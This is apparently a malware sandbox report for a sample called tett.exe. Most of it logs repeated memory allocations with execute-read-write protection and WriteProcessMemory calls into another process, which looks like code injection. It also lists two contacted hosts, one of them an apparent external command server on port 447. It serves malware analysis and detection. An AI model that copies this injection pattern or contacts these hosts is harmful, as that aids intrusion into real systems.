WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: KERNEL32.dll base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1	0
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: oåvF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1	0
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: InitializeCriticalSection base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1	0
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1	0
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: Sleep base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1	0
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1	0
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: GetLastError base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1	0
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1	0
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: CreateThread base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1	0
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1	0
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: DeleteCriticalSection base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1	0
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1	0
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: GetFileSize base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1	0
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1	0
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: SetLastError base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1	0
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 events)

dead_host	192.168.56.102:49817
dead_host	173.81.4.147:447

tett.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All